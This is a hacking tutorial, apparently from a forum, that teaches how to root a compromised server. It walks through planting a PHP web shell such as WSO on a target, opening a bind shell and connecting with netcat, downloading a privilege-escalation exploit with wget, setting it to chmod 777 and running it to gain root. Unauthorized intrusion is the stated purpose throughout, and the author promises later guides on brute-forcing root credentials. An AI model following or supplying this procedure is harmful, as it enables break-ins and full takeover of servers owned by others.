The following are the materials you’ll need before starting:
1. A PHP Shell (Preferably WSO or Ani-Shell which can be downloaded from Sourceforge or Google)
3. A port forwarded router (To be able to back-connect to your shell hosted on your target)
4. An exploited target (or a server)
5. An exploit (Public or Private)
You need to be able to gain remote control of your server/target. To get started, make sure you have a PHP shell uploaded on the your target’s server. A screenshot of a shelled target can look something like below:
Obtain the IP address of your target as you would need it to perform back-connection. Once you have the IP address noted down, navigate your way to the “Network” section of the shell.
While on your shell in the “Network” center, we’ll be using the “Bind Shell” method to establish a connection between our computer and your target.
A screenshot below is an example of how it looks like:
Enter your opened port number in the input port box.
Now let’s move on to our computer and start setting up our connection.
Download Netcat and navigate to the extracted folder using Command Prompt.
A demonstration of how it looks like below:
Enter the command in this format:
nc -v <Target's IP Address> <Opened port number>
Go back to your shell and click the connect button located beside the port input box.
Once that’s done, execute the command in your command prompt to establish a connection..
If successful, you should be able to execute Unix commands.
Some of the unix commands are below:
1. ls (lists files in current directory)
2. uname -a (displays the kernel version of the server)
3. whoami (displays the current user)
4. wget (remotely downloads file specified by a URL)
You can find more by going on here: http://fosswire.com
Now, we’ll be using our command prompt to download the exploit remotely using “wget”.
Your command should look something like this:
After download the exploit zip file, use the following command to extract it.
Once that’s done, we’ll be giving full permissions to the file by chmodding to 777
chmod 777 exploit
If everything done above is succesful, you should be able to run the exploit like so:
If successful, you should be able to be root.
To check, just enter “whoami” or “id”
That’s just the basics of how to root. Sooner or later, I’ll be able to teach you guys how to perform more actions when owning a box and that includes compiling, bypassing and enumerating.
Also, will be showing you a tutorial on how to root via bruteforcing the root user credentials.
Anyways, hope you learned from this tutorial.
I’m ZeroFreak, also known as ZentrixPlus from http://zentrixplus.net
Thanks for viewing this article and have a nice day.